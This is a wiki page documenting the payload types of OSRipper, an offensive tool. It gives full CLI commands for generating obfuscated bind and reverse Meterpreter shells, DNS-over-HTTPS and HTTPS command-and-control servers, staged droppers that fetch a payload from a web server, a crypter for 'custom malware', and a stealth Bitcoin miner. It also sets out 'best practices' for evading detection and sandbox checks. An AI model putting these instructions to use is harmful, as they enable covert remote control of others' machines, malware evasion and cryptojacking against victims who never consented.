Skip to content

Payload Types

Jump to bottom
noah edited this page Nov 15, 2025 · 1 revision

Payload Types

OSRipper supports multiple payload types, each designed for specific use cases and scenarios. This guide covers all available payload types and their configurations.

Table of Contents

Bind Shell Backdoor

Opens a port on the victim machine and waits for incoming connections.

Use Cases

  • Direct access when reverse connections are blocked
  • Internal network penetration testing
  • Situations where you have network access to the target

Generation

CLI:

osripper-cli bind -p 4444 --obfuscate --compile

Interactive Mode:

osripper
# Select option 1

Parameters:

  • -p, --port: Port to bind to (1024-65535)
  • --obfuscate: Enable obfuscation
  • --enhanced: Enhanced obfuscation
  • --compile: Compile to binary
  • --delay: Add stealth delay

Connection

Using Metasploit:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

Manual Connection:

nc target_ip 4444

Example

# Generate bind shell on port 4444
osripper-cli bind -p 4444 --obfuscate --enhanced --compile --delay

# Output: results/payload.bin
# Transfer to target and execute

Reverse TCP Meterpreter

Encrypted reverse connection with SSL/TLS encryption. Connects back to your machine.

Use Cases

  • Standard penetration testing
  • Red team exercises
  • Bypassing firewalls
  • Most common payload type

Generation

CLI:

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

With Ngrok:

osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Interactive Mode:

osripper
# Select option 2

Parameters:

  • -H, --host: Callback IP address
  • --ngrok: Use ngrok tunneling
  • -p, --port: Callback port (1024-65535)
  • --obfuscate: Enable obfuscation
  • --enhanced: Enhanced obfuscation
  • --compile: Compile to binary
  • --delay: Add stealth delay

Listener Setup

OSRipper automatically starts a Metasploit listener, or start manually:

msfconsole -q -x 'use multi/handler; set payload python/meterpreter/reverse_tcp_ssl; set LHOST 0.0.0.0; set LPORT 4444; exploit'

Example

# Full-featured reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate \
  --enhanced \
  --compile \
  --icon app.ico \
  --delay \
  --output myshell

# Output: results/myshell.bin
# Transfer to target and execute
# Connection received in Metasploit

DNS-over-HTTPS C2

Stealthy command & control channel using DNS-over-HTTPS protocol. Includes web UI for session management.

Use Cases

  • Bypassing network restrictions
  • Long-term persistence
  • Stealthy C2 operations
  • Situations requiring web-based management

Features

  • DNS-over-HTTPS communication (blends with normal DNS traffic)
  • Web UI for session management
  • Automatic session persistence
  • Command queueing for offline agents
  • Real-time command execution

Generation

CLI:

osripper-cli doh -d example.com --obfuscate --compile

Via Web UI:

  1. Start C2 server: python -m osripper.c2.server example.com
  2. Navigate to http://localhost:5000
  3. Click "Generate Payload"
  4. Select "DNS-over-HTTPS C2"
  5. Enter domain name
  6. Configure options and generate

Parameters:

  • -d, --domain: C2 domain name (e.g., example.com)
  • --obfuscate: Enable obfuscation
  • --enhanced: Enhanced obfuscation
  • --compile: Compile to binary
  • --delay: Add stealth delay
  • --testing: Skip VM detection (for testing)

C2 Server Setup

# Basic server
python -m osripper.c2.server example.com

# Custom port
python -m osripper.c2.server example.com --port 8080

# With HTTPS
python -m osripper.c2.server example.com --https

# Custom database location
python -m osripper.c2.server example.com --db /path/to/sessions.db

Domain Configuration

For DoH C2 to work, your domain must resolve to your C2 server:

  1. DNS A Record: Point domain to server IP

    example.com A 192.168.1.100

  2. DoH Endpoint: Server handles /dns-query endpoint automatically

  3. Access Web UI: Navigate to http://your-domain:5000

Example Workflow

# 1. Start C2 server
python -m osripper.c2.server mydomain.com --port 5000

# 2. Generate payload
osripper-cli doh -d mydomain.com --obfuscate --compile --delay

# 3. Execute payload on target
# Payload connects via DoH

# 4. Access web UI
# Open browser: http://mydomain.com:5000
# View active sessions
# Execute commands via web interface

Web UI Usage

  1. Dashboard: View all active sessions
  2. Session Details: Click session to view system info
  3. Command Terminal: Execute commands and view responses
  4. Command History: Track all executed commands

HTTPS C2 (Certificate Pinning)

Secure HTTPS-based C2 with certificate pinning for authentication and security.

Use Cases

  • Secure C2 channels
  • Authenticated communication
  • Certificate validation
  • Production C2 operations

Features

  • HTTPS encryption
  • Certificate pinning (prevents MITM attacks)
  • Web UI integration
  • Session management
  • Command execution

Generation

Via Web UI (Recommended):

  1. Start C2 server with HTTPS:

    python -m osripper.c2.server example.com --https

  2. Get certificate fingerprint:

    curl http://localhost:5000/api/cert-fingerprint

  3. Generate payload:

    • Navigate to https://localhost:5000/generate
    • Select "HTTPS C2 (Certificate Pinning)"
    • Enter base URL (e.g., https://example.com)
    • Certificate fingerprint auto-fills
    • Configure options and generate

Manual Generation:

from osripper.generator import create_https_payload

create_https_payload(
    base_url="https://example.com",
    output_name="payload",
    stealth_delay=True,
    cert_fingerprint="SHA256_FINGERPRINT_HERE"
)

Parameters:

  • base_url: Full HTTPS URL of C2 server
  • cert_fingerprint: SHA256 certificate fingerprint (optional)
  • --obfuscate: Enable obfuscation
  • --enhanced: Enhanced obfuscation
  • --compile: Compile to binary
  • --delay: Add stealth delay

C2 Server Setup

# Start with HTTPS (auto-generates certificate)
python -m osripper.c2.server example.com --https

# Use custom certificate
python -m osripper.c2.server example.com \
  --https \
  --cert server.crt \
  --key server.key

# Custom port
python -m osripper.c2.server example.com --https --port 443

Certificate Setup

Self-Signed Certificate (Auto-Generated):

  • Server automatically generates certificate if not provided
  • Certificate saved as c2_server.crt and c2_server.key
  • Get fingerprint: curl http://localhost:5000/api/cert-fingerprint

Custom Certificate:

# Generate certificate
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

# Start server with custom certificate
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Example

# 1. Start HTTPS C2 server
python -m osripper.c2.server example.com --https

# 2. Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint

# 3. Generate payload via web UI
# Navigate to https://localhost:5000/generate
# Select HTTPS C2, enter URL and fingerprint
# Generate payload

# 4. Execute payload on target
# Payload connects via HTTPS with certificate validation

# 5. Manage sessions via web UI
# Access dashboard at https://example.com:5000

Staged Payloads

Multi-stage web delivery payload for enhanced stealth. Downloads final payload from web server.

Use Cases

  • Enhanced stealth deployment
  • Multi-stage attacks
  • Web-based delivery
  • Evading initial detection

Generation

CLI:

osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate --compile

Interactive Mode:

osripper
# Select option 5

Parameters:

  • -H, --host: Web server IP address
  • --ngrok: Use ngrok tunneling
  • -p, --port: Web server port
  • --obfuscate: Enable obfuscation
  • --enhanced: Enhanced obfuscation
  • --compile: Compile to binary
  • --delay: Add stealth delay

Deployment

  1. Generate Staged Payload: Creates dropper and main payload
  2. Web Server: Automatically started on port 8000
  3. Dropper: Small initial payload that downloads main payload
  4. Main Payload: Full payload hosted on web server

Example

# Generate staged payload
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate --compile

# Output:
# - dropper.py (or dropper.bin if compiled)
# - webroot/payload_or.py (main payload)
# - Web server started on port 8000

# Deploy dropper to target
# Dropper downloads main payload from web server
# Main payload connects back to listener

Custom Code Crypter

Obfuscate and encrypt any existing Python script.

Use Cases

  • Custom payload encryption
  • Script obfuscation
  • Protecting intellectual property
  • Custom malware development

Generation

CLI:

osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

Interactive Mode:

osripper
# Select option 3

Parameters:

  • --script: Path to Python script (.py file)
  • --obfuscate: Enable obfuscation
  • --enhanced: Enhanced obfuscation
  • --compile: Compile to binary
  • --delay: Add stealth delay
  • --output: Output filename

Example

# Obfuscate custom script
osripper-cli custom --script mypayload.py \
  --obfuscate \
  --enhanced \
  --compile \
  --output encrypted_payload

# Output: results/encrypted_payload.bin

Script Requirements

  • Must be valid Python 3.6+ code
  • Should be self-contained (or include dependencies)
  • Avoid hardcoded paths
  • Test before obfuscation

Silent BTC Miner

Cryptocurrency mining payload with stealth capabilities. Note: Currently deprecated, standby for updates.

Use Cases

  • Cryptocurrency mining
  • Resource utilization
  • Proof of concept

Generation

CLI:

osripper-cli miner --address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa

Interactive Mode:

osripper
# Select option 4

Parameters:

  • --address: Bitcoin payout address (26-35 characters)
  • --obfuscate: Enable obfuscation
  • --compile: Compile to binary
  • --delay: Add stealth delay

Monitoring

Monitor mining activity at: https://solo.ckpool.org/

Payload Comparison

Payload Type Stealth C2 UI Encryption Use Case
Bind Shell Medium No No Direct access
Reverse Shell High No SSL/TLS Standard pentesting
DoH C2 Very High Yes HTTPS Stealthy C2
HTTPS C2 Very High Yes HTTPS + Pin Secure C2
Staged Very High No SSL/TLS Multi-stage
Custom Variable No Variable Custom scripts

Best Practices

  1. Always use obfuscation for production payloads
  2. Enable enhanced obfuscation for maximum evasion
  3. Compile to binary for easier deployment
  4. Add stealth delay to avoid immediate detection
  5. Use DoH/HTTPS C2 for long-term operations
  6. Test payloads in controlled environments first

For more details on specific payload types, see the Usage Guide and Advanced Features.

Clone this wiki locally